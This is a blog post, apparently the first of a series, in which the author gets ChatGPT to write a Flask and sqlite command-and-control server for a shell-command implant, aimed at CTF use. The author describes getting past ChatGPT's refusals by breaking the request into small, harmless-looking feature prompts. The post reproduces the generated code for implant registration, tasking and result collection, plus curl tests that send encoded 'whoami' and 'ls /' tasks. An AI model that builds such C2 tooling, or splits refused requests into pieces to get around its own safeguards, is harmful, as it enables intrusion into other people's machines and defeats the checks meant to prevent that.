ChatGPT-Assisted Implant Development, Part 1.
This is a rambling post series, as an introduction to some other, forthcoming posts on the same topic. It is mostly a braindump of sorts as I go through the design process and try get GPT to do some element of my job for me.
So recently I have been playing around with ChatGPT a bit, trying to get it to emit some "useful" code for offensive purposes.
Obviously, if you tell it to write you a botnet or implant or whatever, it will trigger the safeguards and tell you to fuck off.
It in fact, has told me to fuck off a number of times, before I learned how to really "guide" it to a good conclusion - slowly.
The whole idea of this project is that I should have to write/modify as little code as possible, getting GPT to create stuff for me without me thinking too hard about anything beyond design, largely as an experiment.
The output won't be "production ready" by any means, but should work "well enough" for some use in CTF.
Final, hand-fixed code will be available on a Github repo for the blog post, here: https://github.com/fullspectrumdev/LooneysMeteorologist
Next post will probably use a different repo so I can "freeze in time" how things were.
Doing some design/planning work.
Before we begin, lets set out some basic design goals. We need to be super explicit about these upfront. GPT is kind of a fucking idiot, so we need to tell it very precisely what to do.
- Implant should be able to run shell commands.
- Command and Control should be written in Flask. An administrative API, and an API for the implants to talk to.
- Implant should be quickly portable across languages.
- Operators should be able to address implants directly.
- The administrative API should be a simple JSON/REST API that lets me submit tasks to the implants, list tasks, list implants...
- For simplicity, the implant will also use JSON for tasking.
Traffic obfuscation, cryptography, stealth, file transfer, etc. are all surplus to requirements for this during the initial design stages. This is basically a hyper-minimal "stage 0" implant.
I also don't care about UI/UX at this time, the only things I care about are "I can use curl or postman to interact". We can build a UI at a later date. I probably will use that as another excuse to use ChatGPT because I hate writing user interfaces.
So the first order of business is to have the implant register itself. From this, we want a few pieces of information:
- A unique identifier for the machine it is running on.
- The current username - what user are we on the box?
- The output of the command "uname -a".
- A unique identifier for that specific implant, like a build-id hardcoded into it.
- When the implant first checked in.
- We also want to store when the implant last checked in.
The second order of business will be defining what interfaces the administrative user (operator) has.
We, as an admin, want to be able to do the following:
- List implants, and information about the implants.
- List all tasks, or tasks for a specific implant, and their status (done or not done).
- Query a specific task to retrieve its output.
- Submit tasks for a specific implant.
- Cancel a task (if it has not been executed already).
The implant needs to be able to do the following things.
- Register itself with the C&C on launch.
- Request tasks.
- Execute the task.
- Submit the output of a task.
Now, given an implant can be given multiple tasks in between check-ins, this means every time it tries to get a task, the C&C needs to find the earliest, incomplete task to give it.
The C&C also needs to update its "last seen" time each time the implant asks for a job, or submits results.
So far, this all looks like a lot of Flask and SQL boilerplate code, to be honest. A task that ChatGPT probably will excel at.
For prototyping reasons, we will write our implant itself in Python, and later convert it to other languages.
Implant Registration.
Our "register" packet will look something like the following. For reasons of bad characters, we will probably base64 encode some fields, which gives us room for encrypting them later "or something".
{
"implant-machine-id": "70fcd324ef2938896a0e979c2344f01f",
"implant-uname": "Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux",
"implant-build-id": "ccf7963d775f6e29d8e5818e878e5e65",
"implant-user": "uid=1001(user) gid=1001(user) groups=1001(user),27(sudo)"
}
The first-seen and check-in timestamps are calculated on the C&C server side.
The implant-machine-id
is something unique from the actual host the implant is running on, for simplicity, we are going to use the contents of the /etc/machine-id
file on Linux.
The implant-build-id
is something we hardcode into each "build" so we can track distribution of our payload. This will be a randomly generated cryptographic hash.
The implant-uname
and implant-user
fields are the outputs of uname -a
and id
on the target machine for now, though we may reconsider this later.
Designing the database/interactions.
We effectively need two "database tables" in this thing.
The first table will be our implants
table, which will probably look something like the following.
implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen
The second table will be our tasks
table, which contains all the job data.
implant-machine-id, task-uuid, task-data, task-created-time, task-status, task-executed-time, task-result
When a job is submitted to the C&C server, the job request will reference the implant-machine-id
, and contain task-data
. Server-side, the C&C will insert it into the database, setting task-status
to 0
, task-created-time
to whenever the task was created, etc. It will return a task-uuid
to the operator.
Tasks can have a task-status
of 0, 1, 2, 3, meaning "submitted, not completed", "in progress", "complete", or "cancelled".
When an implant checks in to request a task, the C&C server will query the database table tasks
for all tasks matching its implant-machine-id
and return the earliest task that has not yet been completed and has not been cancelled, and . It will also update the last-seen
column in the implants
table, and set the task-status
to 1
, meaning the task has been sent to the implant. It will also send the implant the task-uuid
.
When the implant completes the job, it will submit the task-result
and task-uuid
to the C&C. The C&C will update the task-status
to 2
(meaning complete), will record the time, and also will update the last-seen
marker.
In this way, the database effectively is acting as a job queue. The administrative API allows us to do some things, and the "implant" API allows for registration, job retrieval, and result submission.
So far, we basically have been writing out our specification along with a sideways trip into the difficulties of cryptography - don't worry, we will get to the prompt crafting and code in a bit.
Database Selection, More Security thoughts.
I wanted to use Postgres for this originally, but due to its solid Python library, portability, and ease of use for a toy prototype, I decided that sqlite3 was a better option. That way, I can set it up without fucking about with installing postgres, etc.
Contrary to some beliefs, sqlite3 absolutely can handle multiple "database clients" interacting with it simultaneously.
I decided that I'd live with any SQL injection bugs introduced by GPT, that adds to the flavour, and again, it is a toy prototype. It also would amuse me greatly if GPT did introduce some absolute monster of an injection issue.
I figure version 1 will eschew the use of any cryptography, as well as the use of any protection mechanism against SQL injections.
Database Types.
The next step is to define our "database types", or rather, what "type" of data goes into each table/row. Doing this ahead of time will allow us to be extremely specific when it comes to prompting GPT, and if we did want to do some input sanitizing, it makes our jobs a lot easier.
implant-machine-id
: TEXT (length: 32, maybe VARCHAR?)implant-build-id
: TEXT (length: 32, maybe VARCHAR?)implant-uname
: TEXT (no length limit here)implant-user
: TEXT (no length limit here)first-seen
: Datetime (we can use type detection here)last-seen
: Datetime (we can use type detection here)task-uuid
: TEXT (some length limit here depending on our uuid format?)task-data
: TEXT (no length limit here)task-created-time
: Datetime (we can use type detection here)task-status
: Integertask-executed-time
: Datetime (we can use type detection here)task-result
: TEXT (no length limit here).
With those defined, lets write our first prompt - getting it to make a utility script that generates a database file for us.
Making ChatGPT Generate a Sqlite3 Database.
This is going to be fun. It only took me two prompts to make this turn out absolutely perfect.
The first prompt I gave it is as follows:
Using Python, write me a script that will create a Sqlite3 database with two tables, named "implants" and "tasks".
The "implants" table should contain the following columns:
implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen.
The "tasks" table should contain the following columns:
implant-machine-id, task-uuid, task-data, task-created-time, task-status, task-executed-time, task-result
The types of these are as follows:
implant-machine-id: TEXT (fixed length: 32, maybe VARCHAR?)
implant-build-id: TEXT (fixed length: 32, maybe VARCHAR?)
implant-uname: TEXT (no length limit here)
implant-user: TEXT (no length limit here)
first-seen: python's datetime.datetime() (we can use type detection here)
last-seen: python's datetime.datetime() (we can use type detection here)
task-uuid: TEXT (some length limit here - how long is a UUID?)
task-data: TEXT (no length limit here)
task-created-time: python's datetime.datetime() (we can use type detection here)
task-status: Integer
task-executed-time: python's datetime.datetime() (we can use type detection here)
task-result: TEXT (no length limit here).
Its response was as follows:
Here's a Python script that will create a SQLite3 database with two tables named "implants" and "tasks" according to your specifications:
```python
import sqlite3
import uuid
import datetime
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Create the "implants" table
c.execute('''CREATE TABLE implants (
implant_machine_id TEXT(32),
implant_build_id TEXT(32),
implant_uname TEXT,
implant_user TEXT,
first_seen TIMESTAMP,
last_seen TIMESTAMP
)''')
# Create the "tasks" table
c.execute('''CREATE TABLE tasks (
implant_machine_id TEXT(32),
task_uuid TEXT(36),
task_data TEXT,
task_created_time TIMESTAMP,
task_status INTEGER,
task_executed_time TIMESTAMP,
task_result TEXT
)''')
# Commit the changes to the database
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
```
This script creates a SQLite3 database named "my_database.db" and creates two tables inside it: "implants" and "tasks". The "implants" table has six columns, each with a specified data type. The "tasks" table also has six columns, with the task_uuid column being a TEXT column with a length of 36, as UUIDs are 36 characters long. The script uses Python's datetime.datetime() to specify the data types of the "first_seen", "last_seen", "task_created_time", and "task_executed_time" columns. Finally, the script commits the changes to the database and closes the cursor and connection objects.
I gave it a followup prompt:
can the implant_machine_id column in "tasks" table reference the column of the same name and type in the "implants" table?
And here is its response:
Yes, you can create a foreign key reference in the "tasks" table that references the "implant_machine_id" column in the "implants" table. This would ensure referential integrity between the two tables, meaning that the "implant_machine_id" value in the "tasks" table must exist in the "implants" table.
Here's how you could modify the "tasks" table creation code to add a foreign key reference to the "implants" table:
```python
# Create the "tasks" table
c.execute('''CREATE TABLE tasks (
implant_machine_id TEXT(32) REFERENCES implants(implant_machine_id),
task_uuid TEXT(36),
task_data TEXT,
task_created_time TIMESTAMP,
task_status INTEGER,
task_executed_time TIMESTAMP,
task_result TEXT,
PRIMARY KEY (implant_machine_id, task_uuid)
)''')
```
The `REFERENCES` keyword is used to specify the foreign key reference to the "implants" table. In this case, we are referencing the "implant_machine_id" column in the "implants" table.
Note that I also added a composite primary key to the "tasks" table using the `PRIMARY KEY` keyword. This means that the combination of the "implant_machine_id" and "task_uuid" columns must be unique in the "tasks" table.
Which leaves us with this script, which we will creatively name "mkdb.py".
What is very interesting is that this script works absolutely fine with no further effort.
Making ChatGPT Build The Admin API.
This is also going to be extremely fun. I figured the best way to do this was to simply prompt it for each "feature". So I had to define the endpoints I wanted. This was pretty easy, to be perfectly honest. I'll just paste the prompts and outputs below, along with some commentary.
I will note that GPT starts repeating itself a hell of a lot, giving me this boilerplate warning every time that the code its emitting is bad and I should feel bad.
Guess what? I don't fucking care.
First prompt. We want to list implants.
Using the above defined database, I want to write a simple Flask program that allows me to make a simple HTTP GET request to an endpoint named "list_implants", which returns a list of all registered implants in the implants table as JSON.
And its reply...
Here's a simple Flask program that defines an endpoint named "list_implants" that returns all the registered implants in the implants table as JSON:
```python
from flask import Flask, jsonify
import sqlite3
app = Flask(__name__)
@app.route('/list_implants', methods=['GET'])
def list_implants():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute a SELECT query to retrieve all the implants
c.execute('SELECT * FROM implants')
# Fetch all the results as a list of tuples
results = c.fetchall()
# Close the cursor and the connection
c.close()
conn.close()
# Convert the results to a list of dictionaries
implants = []
for row in results:
implants.append({
'implant_machine_id': row[0],
'implant_build_id': row[1],
'implant_uname': row[2],
'implant_user': row[3],
'first_seen': row[4],
'last_seen': row[5]
})
# Return the list of implants as JSON
return jsonify({'implants': implants})
```
This code defines a Flask endpoint named "list_implants" that maps to the "/list_implants" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves all the registered implants from the "implants" table using a SELECT query, and converts the results to a list of dictionaries. Finally, the list of implants is returned as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
Second Prompt...
Can you now show me an example function that maps to an endpoint named "list_tasks", which can either list all tasks, omitting the "task_result" column, or list only tasks for a specific implant, referenced by its implant_machine_id, if specified in a GET parameter?
And its reply...
Sure, here's an example function that maps to an endpoint named "list_tasks" that can list all tasks or list tasks for a specific implant if a "machine_id" query parameter is provided in the GET request:
```python
from flask import Flask, jsonify, request
import sqlite3
app = Flask(__name__)
@app.route('/list_tasks', methods=['GET'])
def list_tasks():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Check if the machine_id query parameter is provided
machine_id = request.args.get('machine_id')
if machine_id:
# Execute a SELECT query to retrieve tasks for a specific implant
c.execute('SELECT implant_machine_id, task_uuid, task_data, task_created_time, task_status, task_executed_time FROM tasks WHERE implant_machine_id=?', (machine_id,))
else:
# Execute a SELECT query to retrieve all tasks, but omitting the task_result column
c.execute('SELECT implant_machine_id, task_uuid, task_data, task_created_time, task_status, task_executed_time FROM tasks')
# Fetch all the results as a list of tuples
results = c.fetchall()
# Close the cursor and the connection
c.close()
conn.close()
# Convert the results to a list of dictionaries
tasks = []
for row in results:
tasks.append({
'implant_machine_id': row[0],
'task_uuid': row[1],
'task_data': row[2],
'task_created_time': row[3],
'task_status': row[4],
'task_executed_time': row[5]
})
# Return the list of tasks as JSON
return jsonify({'tasks': tasks})
```
This code defines a Flask endpoint named "list_tasks" that maps to the "/list_tasks" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves tasks either for a specific implant if a "machine_id" query parameter is provided, or all tasks if the "machine_id" query parameter is not provided, using a SELECT query. The function omits the "task_result" column from the SELECT query, as requested. Finally, the list of tasks is returned as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
Third prompt...
Can you now show me a function that maps to an endpoint named "get_output", that when provided with a GET request containing a task_uuid, returns all of the information about that task? If the task_uuid does not exist, return a 404.
And its reply...
Sure, here's an example function that maps to an endpoint named "get_output" that retrieves information about a task with a specified task_uuid:
```python
from flask import Flask, jsonify, request, abort
import sqlite3
app = Flask(__name__)
@app.route('/get_output', methods=['GET'])
def get_output():
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Get the task_uuid from the query parameters
task_uuid = request.args.get('task_uuid')
# Execute a SELECT query to retrieve the task with the specified task_uuid
c.execute('SELECT * FROM tasks WHERE task_uuid=?', (task_uuid,))
task = c.fetchone()
# Close the cursor and the connection
c.close()
conn.close()
# If no task is found, return a 404 error
if task is None:
abort(404)
# Convert the task tuple to a dictionary
task_dict = {
'implant_machine_id': task[0],
'task_uuid': task[1],
'task_data': task[2],
'task_created_time': task[3],
'task_status': task[4],
'task_executed_time': task[5],
'task_result': task[6]
}
# Return the task information as JSON
return jsonify(task_dict)
```
This code defines a Flask endpoint named "get_output" that maps to the "/get_output" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves the task with the specified task_uuid using a SELECT query. If no task is found, the function returns a 404 error. Otherwise, the function converts the task tuple to a dictionary and returns the task information as JSON.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
So far - all we have been doing is querying data. We also started adding in error handling (which we can paste back to prior functions, that isn't cheating).
Next is the actually hard part: submitting and cancelling tasks.
Submitting a task will be done using a POST request. Here is the prompt.
Can you now show me a function that maps to an endpoint named "submit_task", which accepts the POST variables "implant_machine_id" and "task_data", creates an entry in the tasks table with this data, sets the task_created_time to the current time/date using datetime.datetime(), leaves the task_executed_time empty, sets the task_status to 0, and generates a task_uuid? It should return a JSON object containing the task_uuid and the implant_machine_id.
And here is what it created...
Sure, here's an example function that maps to an endpoint named "submit_task" and creates a new task entry in the database:
```python
from flask import Flask, jsonify, request
import sqlite3
import uuid
from datetime import datetime
app = Flask(__name__)
@app.route('/submit_task', methods=['POST'])
def submit_task():
# Get the POST data
implant_machine_id = request.form['implant_machine_id']
task_data = request.form['task_data']
# Generate a new UUID for the task
task_uuid = str(uuid.uuid4())
# Get the current datetime
current_time = datetime.now()
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute an INSERT query to create a new task entry
c.execute('INSERT INTO tasks VALUES (?, ?, ?, ?, ?, ?, ?)', (implant_machine_id, task_uuid, task_data, current_time, 0, None, None))
# Commit the transaction
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
# Return the task information as JSON
return jsonify({'task_uuid': task_uuid, 'implant_machine_id': implant_machine_id})
```
This code defines a Flask endpoint named "submit_task" that maps to the "/submit_task" URL path and accepts only POST requests. When a POST request is made to this endpoint, the function retrieves the "implant_machine_id" and "task_data" POST variables, generates a new UUID for the task, gets the current datetime using datetime.now(), and executes an INSERT query to create a new task entry in the database. The function then returns a JSON object containing the task_uuid and the implant_machine_id.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
The "cancel task" logic is going to be a bit more complex. Here is what I came up with.
Can you now show me a function that maps to an endpoint named "cancel_task", which takes a GET parameter named "task_uuid". It should check if the task_uuid exists, and that its task_status is 0. If these conditions are met, it should set the task_status of this entry to 3, which indicates the task has been cancelled.
Now, here is what it created as output for me.
Sure, here's an example function that maps to an endpoint named "cancel_task" and cancels a task by updating its status in the database:
```python
from flask import Flask, jsonify, request
import sqlite3
app = Flask(__name__)
@app.route('/cancel_task', methods=['GET'])
def cancel_task():
# Get the task_uuid from the GET parameters
task_uuid = request.args.get('task_uuid')
# Create a connection to the database
conn = sqlite3.connect('my_database.db')
# Create a cursor object
c = conn.cursor()
# Execute a SELECT query to check if the task_uuid exists and its task_status is 0
c.execute('SELECT task_status FROM tasks WHERE task_uuid=?', (task_uuid,))
result = c.fetchone()
if result is None:
# If the task_uuid doesn't exist, return a 404
return jsonify({'error': 'Task not found'}), 404
elif result[0] != 0:
# If the task_status is not 0, return an error
return jsonify({'error': 'Task status is not 0, cannot cancel'}), 400
else:
# If the task_uuid exists and its task_status is 0, update its status to 3 to cancel it
c.execute('UPDATE tasks SET task_status=3 WHERE task_uuid=?', (task_uuid,))
conn.commit()
# Close the cursor and the connection
c.close()
conn.close()
# Return a success message
return jsonify({'message': 'Task cancelled successfully'})
```
This code defines a Flask endpoint named "cancel_task" that maps to the "/cancel_task" URL path and accepts only GET requests. When a GET request is made to this endpoint, the function retrieves the "task_uuid" GET parameter and executes a SELECT query to check if the task_uuid exists and its task_status is 0. If these conditions are met, the function executes an UPDATE query to set the task_status of the task entry to 3 to cancel it. If the task_uuid doesn't exist, the function returns a 404 error. If the task_status is not 0, the function returns a 400 error. If the task is successfully cancelled, the function returns a success message.
Note that this is a simple example that doesn't handle errors or use best practices such as using Flask's built-in database support or using a database connection pool. You should also ensure that your Flask application is secure by properly validating user input and implementing appropriate security measures.
So far, all of this looks relatively successful. However, we can't really wire it up or test it properly without the corresponding implant API, so that comes next!
Making ChatGPT Build The Implant API.
This is going to be even more fun!
First, we tackle the "register" endpoint. This is a simple enough one to do.
Can you now show me a function that maps to the endpoint named "register", which accepts the following HTTP POST parameters: implant_machine_id, implant_build_id, implant_uname, implant_user.
It should insert these values into the implants database table, setting the first_seen to the current datetime.datetime() timestamp, and also setting the same value for last_seen.
And the response...
Sure, here's an example function that maps to the "register" endpoint:
```python
from flask import Flask, request, jsonify
import sqlite3
import datetime
app = Flask(__name__)
@app.route('/register', methods=['POST'])
def register():
try:
# extract POST parameters
implant_machine_id = request.form['implant_machine_id']
implant_build_id = request.form['implant_build_id']
implant_uname = request.form['implant_uname']
implant_user = request.form['implant_user']
# connect to the database
conn = sqlite3.connect('mydatabase.db')
c = conn.cursor()
# insert values into the implants table
current_time = datetime.datetime.now()
c.execute("INSERT INTO implants (implant-machine-id, implant-build-id, implant-uname, implant-user, first-seen, last-seen) VALUES (?, ?, ?, ?, ?, ?)",
(implant_machine_id, implant_build_id, implant_uname, implant_user, current_time, current_time))
# commit the transaction and close the connection
conn.commit()
conn.close()
# return success message
response = {'message': 'Registration successful'}
return jsonify(response), 200
except Exception as e:
# if an error occurs, return error message
response = {'message': 'Error: ' + str(e)}
return jsonify(response), 400
```
This function accepts a POST request to the "register" endpoint, and extracts the necessary parameters from the request's form data. It then connects to the SQLite database, inserts the values into the "implants" table, with the "first_seen" and "last_seen" columns set to the current timestamp. Finally, it returns a JSON response with a success or error message.
Next we need to tackle the "get_task" one. This one actually is a bit of a bother, to be perfectly honest.
Can you now show me a function that maps to an endpoint named "get_task", which takes an "implant_machine_id" as its only POST parameter?
It should update the appropriate entry in the implants table, setting the last_seen time to the current timestamp.
It should check the tasks table for tasks that are assigned to that implant_machine_id, which have a task_status value of 0. It should select the task with the earliest timestamp, update its task_status to 1, and return a JSON response containing the task_uuid and the task_data.
If no task is available, return a 404.
And its (surprisingly good looking) response.
Sure, here's an example function that maps to an endpoint named "get_task":
```python
import json
from datetime import datetime
import sqlite3
from flask import Flask, request, jsonify
app = Flask(__name__)
DATABASE = 'database.db'
@app.route('/get_task', methods=['POST'])
def get_task():
implant_machine_id = request.form['implant_machine_id']
conn = sqlite3.connect(DATABASE)
cursor = conn.cursor()
# Update last seen time for the given implant
cursor.execute("UPDATE implants SET last_seen = ? WHERE implant_machine_id = ?",
(datetime.now(), implant_machine_id))
# Find the next task for this implant
cursor.execute("SELECT task_uuid, task_data FROM tasks WHERE implant_machine_id = ? AND task_status = 0 ORDER BY task_created_time ASC LIMIT 1",
(implant_machine_id,))
task = cursor.fetchone()
if task is None:
return jsonify({'error': 'No task available for this implant'}), 404
# Update the task status to 1
task_uuid, task_data = task
cursor.execute("UPDATE tasks SET task_status = 1 WHERE task_uuid = ?",
(task_uuid,))
conn.commit()
conn.close()
return jsonify({'task_uuid': task_uuid, 'task_data': json.loads(task_data)})
```
This function first retrieves the `implant_machine_id` from the POST request parameters, then updates the `last_seen` field for the corresponding implant in the `implants` table with the current timestamp.
It then selects the next task for the given implant from the `tasks` table, with a `task_status` of 0 and ordered by `task_created_time`. If no task is available, it returns a 404 error.
If a task is available, it updates its `task_status` to 1 and returns a JSON response containing the `task_uuid` and `task_data`.
Now for the final piece: returning the data.
Can you now show me a function that maps to an endpoint named "submit_result", which takes an "implant_machine_id", "task_result", and "task_uuid" as POST parameters?
It should update the implants table's "last_seen" marker with the current timestamp for that "implant_machine_id", as well as updating the appropriate row in the "tasks" table for the "task_uuid" with the "task_result" data, along with setting "task_status" to 2, and "task_executed_time" to the current timestamp.
And the result...
Sure, here's an example function that maps to an endpoint named "submit_result":
```python
import sqlite3
from flask import Flask, request, jsonify
import datetime
app = Flask(__name__)
@app.route('/submit_result', methods=['POST'])
def submit_result():
# get parameters from POST request
implant_machine_id = request.form['implant_machine_id']
task_result = request.form['task_result']
task_uuid = request.form['task_uuid']
# update implants table's "last_seen" marker
conn = sqlite3.connect('database.db')
cur = conn.cursor()
cur.execute('UPDATE implants SET last_seen=? WHERE implant_machine_id=?', (datetime.datetime.now(), implant_machine_id))
conn.commit()
# update tasks table's appropriate row with "task_result" data
cur.execute('UPDATE tasks SET task_result=?, task_status=?, task_executed_time=? WHERE task_uuid=?', (task_result, 2, datetime.datetime.now(), task_uuid))
conn.commit()
# return success message as JSON
response = {'message': 'Task result submitted successfully.'}
return jsonify(response)
```
This function first gets the parameters from the POST request, including the implant_machine_id, task_result, and task_uuid.
Next, it updates the implants table's "last_seen" marker for the specified "implant_machine_id".
Finally, it updates the appropriate row in the tasks table for the specified "task_uuid", setting the "task_result" data, as well as the "task_status" to 2, and the "task_executed_time" to the current timestamp.
It then returns a JSON response containing a success message.
Now we have to wire up these functions into our final Flask program, which means just sanity checking the variables, ensuring the imports are all fine, and adding a main at the end. Not hard.
When we got to testing, we found a few bugs (mostly due to variable names being fucked up by GPT, or import issues). Nothing that we couldn't fix with a full on test of every endpoint and parameter and state though.
Testing our work so far with "curl".
This was honestly quite time consuming, and did surface a few bugs - as mentioned, it was just inconsistent naming of imports, and a couple of variables that got messed up. I probably would have spotted those had I reviewed the code a bit better, but oh well, testing shook em loose.
First, we register ourselves an implant using the /register
endpoint.
$ export MID="79ef32b5ea31cbff9bbd405c61a6440d"
$ export BID="81312ee0edbffd6eacabe62905325051"
$ export IMPUNAME="TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg=="
$ export IMPUSER="dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK"
$ curl -s -d "implant_machine_id=$MID&implant_build_id=$BID&implant_uname=$IMPUNAME&implant_user=$IMPUSER" http://127.0.0.1:5000/register
{"message":"Registration successful"}
Now we check that it is registered.
$ curl -s http://127.0.0.1:5000/list_implants | jq
{
"implants": [
{
"first_seen": "2023-05-02 09:51:10.416314",
"implant_build_id": "81312ee0edbffd6eacabe62905325051",
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"implant_uname": "TGludXggZGViaWFuIDUuMTAuMC05LWFtZDY0ICMxIFNNUCBEZWJpYW4gNS4xMC43MC0xICgyMDIxLTA5LTMwKSB4ODZfNjQgR05VL0xpbnV4Cg==",
"implant_user": "dWlkPTEwMDEodXNlcikgZ2lkPTEwMDEodXNlcikgZ3JvdXBzPTEwMDEodXNlciksMjcoc3VkbykK",
"last_seen": "2023-05-02 09:51:10.416314"
}
]
}
Next, we check if we have any tasks from the admin side.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": []
}
Time to create a task.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=d2hvYW1pCg==' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
Check it is listed.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
]
}
Create another task, and list tasks again.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo=' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
}
]
}
Now we test listing tasks by machine ID.
$ curl -s http://127.0.0.1:5000/list_tasks?machine_id=79ef32b5ea31cbff9bbd405c61a6440d | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 0,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
}
]
}
Now we try cancel a task.
$ curl -s http://127.0.0.1:5000/cancel_task?task_uuid=4cf2a102-f160-4af0-b449-8c8434f78937 | jq
{
"message": "Task cancelled successfully"
}
Add another task.
$ curl -s http://127.0.0.1:5000/submit_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_data=bHMgLwo=' | jq
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
Get the implant to request a task.
$ curl -s http://127.0.0.1:5000/get_task -d 'implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d'
{"task_data":"bHMgLwo=","task_uuid":"be33a894-00e0-4003-9053-a12c2cca330b"}
Now we check to see what the state of our tasks is?
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 1,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 3,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 1,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
]
}
Submit a task result!
$ curl -s http://127.0.0.1:5000/submit_result -d "task_uuid=be33a894-00e0-4003-9053-a12c2cca330b&implant_machine_id=79ef32b5ea31cbff9bbd405c61a6440d&task_result=loltest"
{"message":"Task result submitted successfully."}
List tasks again to see if it has been updated.
$ curl -s http://127.0.0.1:5000/list_tasks | jq
{
"tasks": [
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:51:44.506096",
"task_data": "d2hvYW1pCg==",
"task_executed_time": null,
"task_status": 1,
"task_uuid": "59ca6ad4-3588-425b-8f00-27a52826ad6a"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:52:10.036675",
"task_data": "bHMgLwo=",
"task_executed_time": null,
"task_status": 3,
"task_uuid": "4cf2a102-f160-4af0-b449-8c8434f78937"
},
{
"implant_machine_id": "79ef32b5ea31cbff9bbd405c61a6440d",
"task_created_time": "2023-05-02 09:54:48.561148",
"task_data": "bHMgLwo=",
"task_executed_time": "2023-05-02 09:56:45.010077",
"task_status": 2,
"task_uuid": "be33a894-00e0-4003-9053-a12c2cca330b"
}
]
}
Now we go check to see if there is task results.
